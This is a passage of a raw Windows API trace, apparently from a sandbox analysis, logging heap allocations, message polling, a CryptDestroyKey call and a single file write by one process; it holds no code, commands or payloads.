returned 0x2e54d18 [0208.860] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0208.860] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.860] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0208.860] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.860] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0208.860] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0208.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0208.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0208.861] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0208.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0208.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f98) returned 0x2ea8270 [0208.861] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0208.861] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f98) returned 0x2ed01b0 [0208.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0208.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0208.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8270 | out: hHeap=0x970000) returned 1 [0208.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0208.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0208.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0208.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0208.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f98) returned 0x2ea8270 [0208.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ed01b0 | out: hHeap=0x970000) returned 1 [0208.867] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0208.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0208.867] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x13f98) returned 0x2ed01b0 [0208.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ea8270 | out: hHeap=0x970000) returned 1 [0208.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0208.869] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0208.870] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0208.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e942d0 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0208.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0208.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0208.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0208.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0208.926] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0208.927] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f24018*, nNumberOfBytesToWrite=0x13f98, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f24018*, lpNumberOfBytesWritten=0x8cf5e4*=0x13f98, lpOverlapped=0x0) returned 1 [0208.933] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0208.933] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0208.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0208.933] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0208.933] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0208.934] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0208.934] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0208.934] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0208.934] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0208.934] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.934] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50740, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0208.934] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0208.935] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0208.935] CryptDestroyKey (hKey=0xa87050) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0208.935] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0208.936] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0208.936] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0208.937] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0208.937] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0208.937] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0208.937] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0208.937] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0208.937] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0208.937] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50860 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0208.938] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0208.938] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0208.939] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0208.939] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0208.939] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, 